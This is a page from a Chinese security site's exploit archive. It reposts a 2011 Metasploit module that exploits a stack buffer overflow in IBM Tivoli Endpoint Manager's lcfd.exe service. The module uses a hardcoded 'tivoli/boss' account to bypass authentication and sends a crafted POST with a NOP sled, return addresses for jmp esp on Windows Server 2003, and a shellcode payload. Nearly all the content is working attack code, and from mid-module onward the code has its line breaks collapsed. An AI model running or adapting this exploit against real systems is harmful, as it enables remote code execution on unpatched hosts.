首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM Tivoli Endpoint Manager POST Query Buffer Overflow
来源:http://www.metasploit.com 作者:bannedit 发布时间:2011-06-13  
##
# $Id: ibm_tivoli_endpoint_bof.rb 12925 2011-06-12 00:04:55Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IBM Tivoli Endpoint Manager POST Query Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack based buffer overflow in the way IBM Tivoli 
				Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query 
				arguments.

				This issue can be triggered by sending a specially crafted HTTP POST request to 
			the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization
			is required. This exploit makes use of a second vulnerability, a hardcoded account 
			(tivoli/boss) is used to bypass the authorization restriction.
			},
			'Author'         =>
				[
					'bannedit', # metasploit module
					'Jeremy Brown <0xjbrown[at]gmail.com>', # original public exploit
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 12925 
, 'References' => [ [ 'CVE', '2011-1220'], [ 'OSVDB', '72713'], # buffer overflow [ 'OSVDB', '72751'], # hardcoded account [ 'BID', '48049'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-169/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Privileged' => true, 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x0d\x0a", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ ['Windows Server 2003 SP0', { 'Ret' => 0x77d80787 }], # user32.dll - jmp esp ['Windows Server 2003 SP1', { 'Ret' => 0x77403680 }], # user32.dll - jmp esp ['Windows Server 2003 SP2', { 'Ret' => 0x77402680 }], # user32.dll - jmp esp ], 'DisclosureDate' => 'May 31 2011')) register_options( [ Opt::RPORT(9495), ], self.class ) end def exploit print_status("Trying target #{target.name}...") auth = Rex::Text.encode_base64("tivoli:boss") varname = rand_text_alpha(rand(10)) sploit = make_nops(1) * 256 sploit << [target.ret].pack('V') sploit << payload.encoded print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") res = send_request_cgi({ 'uri' => '/addr', 'method' => 'POST', 'headers' => { 'Authorization' => "Basic #{auth}" }, 'vars_post' => { varname => sploit, }, }, 5) handler end end
 
[推荐] [评论(2条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Pacer Edition CMS 2.1 Arbitrar
·UUSEE Active-X Buffer Overflow
·FreeBSD/x86 Execve ('/bin/sh')
·KMPlayer 3.0.0.1440 Buffer Ove
·7-Technologies IGSS 9 IGSSdata
·DEC Alpha Linux 3.0 Local Root
·phpcms v2.4 SQL injection expl
·FreeBSD/x86 SmallBind TCP on p
·ActFax Server FTP Remote BOF (
·Linux/x86-32 - ConnectBack wit
·VLC Media Player XSPF Local Fi
·Cisco AnyConnect VPN Client Ac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved